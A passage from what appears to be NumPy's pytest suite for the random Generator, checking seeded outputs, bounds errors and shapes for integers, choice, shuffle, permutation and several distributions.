x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
import hashlib
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
